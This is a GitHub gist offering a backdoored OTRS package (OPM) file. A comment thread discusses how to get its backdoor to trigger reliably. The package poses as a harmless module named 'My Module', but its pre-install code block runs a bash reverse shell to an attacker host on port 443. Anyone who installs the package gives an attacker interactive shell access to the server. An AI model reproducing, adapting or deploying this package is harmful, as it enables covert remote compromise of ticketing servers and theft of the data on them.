Skip to content

Instantly share code, notes, and snippets.

Last active May 30, 2018 17:17
  • Star 10 You must be signed in to star a gist
  • Fork 9 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
OTRS OPM backdoored Package with Reverse Shell
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Vendor>My Module</Vendor>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<BuildDate>2016-09-23 11:17:41</BuildDate>
<IntroInstall Lang="en" Title="My Module" type="pre">
Hello wolrd
<CodeInstall type="pre">
print qx(bash -i >& /dev/tcp/<ATTACKER_IP>/443 0>&1 &);
<CodeInstall Type="post">
# create the package name
my $CodeModule = 'var::packagesetup::' . $Param{Structure}-&gt;{Name}-&gt;{Content};
<CodeUninstall type="pre">
my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content};
Copy link

As per the specs published by OTRS, BuildDate and BuildHost are auto-filled by the server. No need to include those.

After lots of testing, I ascertained that you technically don't need the blocks CodeInstall-post and CodeUninstall-pre.

I'm now fighting with the IntroInstall, trying to figure out why the OPM won't run the backdoor unless the IntroInstall contains specific chars.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment